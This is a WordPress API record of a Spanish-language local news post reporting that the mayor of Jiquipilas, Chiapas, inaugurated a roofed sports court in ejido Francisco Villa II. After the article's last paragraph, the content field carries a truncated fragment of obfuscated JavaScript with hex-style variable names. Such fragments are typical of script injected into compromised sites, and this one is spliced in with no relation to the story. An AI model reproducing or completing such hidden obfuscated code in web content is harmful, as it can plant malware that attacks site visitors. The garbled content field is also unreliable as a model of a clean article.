{"id":9951,"date":"2023-05-09T06:52:24","date_gmt":"2023-05-09T06:52:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9951"},"modified":"2023-05-09T06:52:25","modified_gmt":"2023-05-09T06:52:25","slug":"inaugura-hugo-lazaro-techado-con-arco-techo-en-ejido-francisco-villa-ii","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9951","title":{"rendered":"Inaugura Hugo L\u00e1zaro techado con arco techo en ejido Francisco Villa II"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"9953\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.50-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-9953\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.50-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.50-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.50-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.50-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"9954\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-9954\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-1-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-1-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-1-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-1.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"9952\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-9952\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-08-at-10.21.47-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u2022 Refrend\u00f3 continuar trabajando responsablemente en todos los rubros para que en Jiquipilas se consolide el bienestar.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Reconoci\u00f3 a los equipos de b\u00e1squetbol que participaron en un torneo rel\u00e1mpago por la inauguraci\u00f3n del domo.<\/li>\n<\/ul>\n\n\n\n<p>8 de mayo del 2023. Jiquipilas, Chiapas. \u2013 \u201cSeguimos cumpliendo con hechos nuestra palabra empe\u00f1ada con el pueblo, como en esta ocasi\u00f3n en el ejido Francisco Villa II donde estamos inaugurando la construcci\u00f3n de techado con arco techo en la cancha de usos m\u00faltiples\u201d, dijo el Presidente Municipal C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez.<\/p>\n\n\n\n<p>Acompa\u00f1ado de las autoridades ejidales, habitantes de la comunidad y funcionarios municipales, el Alcalde recalc\u00f3 que hoy el Gobierno Municipal cumple en tiempo y forma los compromisos institucionales.<\/p>\n\n\n\n<p>Explic\u00f3 que esta obra fue posible gracias a la priorizaci\u00f3n de la comunidad a trav\u00e9s del COPLADEM, por lo que hoy se est\u00e1 constatando que escuchar la voz de la gente da resultados, porque se hace lo que el pueblo necesita para vivir mejor.<\/p>\n\n\n\n<p>Hugo L\u00e1zaro refrend\u00f3 su compromiso con los habitantes de este ejido, a quienes les expuso que se contin\u00faa trabajando responsablemente en cada uno de los rubros para que en Jiquipilas se consolide el bienestar.<\/p>\n\n\n\n<p>Con estos recursos del proyecto se logr\u00f3 hacer la ampliaci\u00f3n de la cancha de usos m\u00faltiples de 27 a 30 metros con \u201cfirme de concreto\u201d. Por esa raz\u00f3n, Patriarco S\u00e1nchez Gonz\u00e1lez Comisariado ejidal agradeci\u00f3 al Alcalde Hugo L\u00e1zaro por su excelente forma de gobernar Jiquipilas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Refrend\u00f3 continuar trabajando responsablemente en todos los rubros para que en Jiquipilas se consolide el bienestar. Reconoci\u00f3 a los equipos de b\u00e1squetbol que participaron en un torneo rel\u00e1mpago por la inauguraci\u00f3n del domo. 8 de mayo del 2023. Jiquipilas, Chiapas. \u2013 \u201cSeguimos cumpliendo con hechos nuestra palabra empe\u00f1ada con el pueblo, como en esta &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9953,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9951","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9951"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9951\/revisions"}],"predecessor-version":[{"id":9955,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9951\/revisions\/9955"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9953"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9951"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}